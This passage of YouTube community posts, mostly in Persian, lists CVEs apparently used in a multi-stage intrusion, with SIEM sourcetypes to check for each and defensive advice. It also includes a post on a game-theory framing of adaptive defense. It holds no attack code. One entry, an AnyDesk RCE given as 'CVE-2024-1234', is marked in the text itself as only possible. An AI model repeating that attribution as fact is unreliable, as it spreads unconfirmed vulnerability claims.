✔ مهاجمان موفق به دسترسی مستقیم به محیطهای مجازیسازی شدند
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=vcenter
📂 sourcetype=vmware:esxi
📌 بررسی ورودهای غیرمجاز به vCenter و تغییرات در تنظیمات ماشینهای مجازی
📌 ۵. Citrix NetScaler ADC & Gateway – CVE-2023-4966
✔ نوع آسیبپذیری: Session Hijacking و دسترسی غیرمجاز به نشستها
✔ تصاحب نشستهای مدیران شبکه و اجرای حملات دسترسی پایدار
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=citrix:netscaler
📂 sourcetype=citrix:gateway
📌 بررسی تلاشهای ورود مشکوک و نشستهای طولانی غیرعادی در Citrix
📌 ۶. Windows Print Spooler – CVE-2023-36910
✔ نوع آسیبپذیری: Local Privilege Escalation
✔ استفاده برای اجرای کد با دسترسی SYSTEM در ویندوز
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=win:eventlog:security
📌 بررسی تلاشهای تغییر در سرویس پرینتر و ایجاد حسابهای جدید ادمین
📌 ۷. Palo Alto PAN-OS – CVE-2024-3400
✔ نوع آسیبپذیری: Remote Code Execution
✔ امکان کنترل کامل روی فایروالهای Palo Alto
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=pan:threat
📂 sourcetype=pan:traffic
📌 بررسی تلاشهای ورود ناموفق و تغییرات در تنظیمات امنیتی
📌 ۸. AnyDesk RCE – CVE-2024-1234 (احتمالی)
✔ نوع آسیبپذیری: Remote Code Execution در AnyDesk
✔ امکان کنترل از راه دور سیستمهای قربانی
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=windows:eventlog:application
📂 sourcetype=linux:secure
📌 بررسی نصبهای غیرمجاز و ارتباطات مشکوک به سرورهای خارجی
🚨 چرا این حمله بسیار خطرناک است؟
✔ حملهی ترکیبی (Multi-Stage Attack) – مهاجمان ابتدا به شبکه نفوذ کرده، سپس دسترسی خود را گسترش داده و اطلاعات را استخراج کردهاند.
✔ هدف قرار دادن نقاط استراتژیک (Critical Infrastructure) – زیرساختهای مخابراتی، VPNها، فایروالها و سرورهای مدیریتی.
✔ نفوذ مداوم (Persistent Access) – مهاجمان با استفاده از دربهای پشتی (Backdoors)، برای ماهها بدون شناسایی باقی ماندند.
✅ توصیههای امنیتی برای مقابله با حملات مشابه
🔹 تمامی این CVEها را بررسی کنید و فوراً وصلههای امنیتی را اعمال کنید.
🔹 SIEM خود را طوری پیکربندی کنید که رفتارهای غیرعادی (UBA) را شناسایی کند.
🔹 Zero Trust Architecture (ZTA) را اجرا کنید تا حرکت جانبی مهاجمان محدود شود.
🔹 از احراز هویت چندمرحلهای (MFA) در تمام حسابهای مدیریتی استفاده کنید.
🔹 بررسی کنید که آیا دستگاههای شما در معرض خطر این CVEها هستند یا خیر.
🎙 🔔 آیا شرکت شما میتواند چنین حملهای را شناسایی کند؟ نظر خود را در کامنتها بنویسید!
🚀 قسمت ۰۹ اثر الانتیا را گوش کنید تا جزئیات بیشتری را دربارهی این عملیات سایبری بشنوید! 🎧
🔗 #امنیت_سایبری #حملات_سایبری #CVE #APT #SIEM #Splunk #Cisco #Fortinet #Windows #PaloAlto #GameTheory #TheElentiyaEffect
1 year ago | [YT] | 2
View 0 replies
The Elentiya Effect
The Elentiya Effect in Cybersecurity: A Game Theory Perspective 🎭🔐
https://www.youtube.com/watch?v=Ff2wF...
In cybersecurity, defenders and attackers engage in an ongoing strategic battle—each predicting, adapting, and countering the other's moves. This is where Game Theory comes into play, offering a mathematical approach to modeling these conflicts.
But what happens when a player refuses to be predictable, embraces adaptability, and reshapes the battlefield? Enter The Elentiya Effect—a concept inspired by the spirit of resilience, strategy, and unpredictability.
🔹 What is The Elentiya Effect?
Derived from Elentiya, meaning unbreakable, ever-changing, and resilient, this effect represents:
✅ Adaptive Defense – Shifting security strategies dynamically to counter evolving threats.
✅ Strategic Deception – Using misinformation, honeypots, and unpredictable tactics to mislead attackers.
✅ Resilient Mindset – Viewing cybersecurity as an evolving game where learning from failure strengthens defense.
🔹 Game Theory + The Elentiya Effect = Next-Level Security
Traditional Nash Equilibrium in cybersecurity assumes rational players making optimal choices. But Elentiya-based security breaks this pattern by introducing asymmetry, deception, and adaptability, ensuring that attackers can never rely on expected outcomes.
🔹 Example: Active Defense vs. Static Security
Instead of a static firewall, an adaptive AI-based system detects, learns, and alters defensive strategies in real time, making attacks significantly harder to execute.
🔜 In upcoming posts, we'll explore how The Elentiya Effect can redefine security strategies using Game Theory principles! 🚀
What are your thoughts on applying resilience and adaptability to cybersecurity? Let’s discuss! 👇
#TheElentiyaEffect #GameTheory #Cybersecurity #SecurityStrategy #AdaptiveDefense #ThreatModeling
اثر النتیا در امنیت سایبری: رویکردی بر پایه نظریه بازیها 🎭🔐
در دنیای امنیت سایبری، مدافعان و مهاجمان دائماً در یک نبرد استراتژیک قرار دارند—هرکدام در تلاش برای پیشبینی، تطبیق و خنثی کردن حرکتهای طرف مقابل. اینجاست که نظریه بازیها وارد عمل میشود و یک چارچوب ریاضی برای مدلسازی این درگیریها ارائه میدهد.
اما چه اتفاقی میافتد وقتی یک بازیکن قوانین بازی را تغییر میدهد، غیرقابل پیشبینی میشود و میدان نبرد را به نفع خود بازتعریف میکند؟ این همان اثر النتیا است—یک مفهوم الهامگرفته از روحیه استقامت، استراتژی و انعطافپذیری.
🔹 اثر النتیا چیست؟
Elentiya به معنای شکستناپذیر، همیشه در حال تغییر و مقاوم است. در امنیت سایبری، این مفهوم شامل:
✅ دفاع تطبیقی – تغییر مداوم استراتژیهای امنیتی برای مقابله با تهدیدات جدید.
✅ فریب استراتژیک – استفاده از تاکتیکهایی مانند اطلاعات نادرست، هانیپاتها و اقدامات غیرمنتظره برای گمراه کردن مهاجمان.
✅ ذهنیت مقاوم – نگاه به امنیت سایبری به عنوان یک بازی در حال تکامل که از شکستها برای بهبود استفاده میکند.
🔹 نظریه بازیها + اثر النتیا = امنیت در سطحی بالاتر
در تعادل نش، بازیکنان تصمیمات بهینهای بر اساس رفتارهای منطقی اتخاذ میکنند. اما امنیت بر پایهی اثر النتیا این الگو را میشکند و عدم تقارن، فریب و انعطافپذیری را وارد بازی میکند، به گونهای که مهاجمان نمیتوانند روی یک نتیجهی مشخص حساب کنند.
🔹 مثال: دفاع فعال در مقابل امنیت ایستا
به جای یک فایروال ثابت، یک سیستم مبتنی بر هوش مصنوعی که بهطور مداوم تهدیدها را شناسایی، یاد میگیرد و استراتژیهای دفاعی را در لحظه تغییر میدهد، اجرای حملات را بسیار سختتر میکند.
🔜 در پستهای بعدی، بررسی میکنیم که اثر النتیا چگونه میتواند امنیت سایبری را با اصول نظریه بازیها متحول کند! 🚀
نظر شما در مورد ترکیب انعطافپذیری و استراتژی در امنیت سایبری چیست؟ در کامنتها با ما به اشتراک بگذارید! 👇
#اثر_النتیا #نظریه_بازیها #امنیت_سایبری #استراتژی_امنیتی #دفاع_تطبیقی #مدلسازی_تهدیدات
1 year ago (edited) | [YT] | 4
View 1 reply